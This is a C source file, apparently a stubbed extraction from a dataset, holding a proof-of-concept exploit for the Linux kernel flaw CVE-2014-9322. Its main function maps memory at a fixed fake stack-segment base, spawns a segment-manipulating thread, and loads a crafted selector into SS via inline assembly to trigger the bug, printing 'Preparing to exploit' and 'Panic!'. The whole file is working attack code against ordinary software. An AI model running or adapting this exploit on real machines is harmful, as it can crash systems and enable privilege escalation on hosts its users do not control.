
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int uint8_t ;
typedef int pthread_t ;


 scalar_t__ FALSE_SS_BASE ;
 scalar_t__ FLAG ;
 int MAP_ANON ;
 int MAP_FIXED ;
 int MAP_PRIVATE ;
 int MAP_SIZE ;
 int PROT_READ ;
 int PROT_WRITE ;
 int fprintf (int ,char*,scalar_t__) ;
 scalar_t__ mmap (void*,int ,int,int,int,int ) ;
 int perror (char*) ;
 int printf (char*) ;
 scalar_t__ pthread_create (int *,int *,int ,int *) ;
 int segManipulatorThread ;
 int sleep (int) ;
 int stderr ;

int main()
{

  pthread_t thread1;
  uint8_t *code;

  printf("[cve_2014_9322]: Preparing to exploit.\n");


  code = (uint8_t *)mmap((void *)FALSE_SS_BASE, MAP_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANON|MAP_PRIVATE, -1, 0);
  if (code != (uint8_t *) FALSE_SS_BASE)
  {
    fprintf(stderr, "[cve_2014_9322 Error]: Unable to map memory at address: %lu\n", FALSE_SS_BASE);
    return -1;
  }

    printf("[cve_2014_9322]:  Panic!\n");
  if(pthread_create(&thread1, ((void*)0), segManipulatorThread, ((void*)0))!= 0)
  {
    perror("[cve_2014_9322 error]: pthread_create");
    return 0;
  }


  sleep(1);


  asm volatile ("mov %0, %%ss;"
    :
    :"r" (0x97)
  );

  while(FLAG == 0){};
  sleep(4);

  return 0;
}
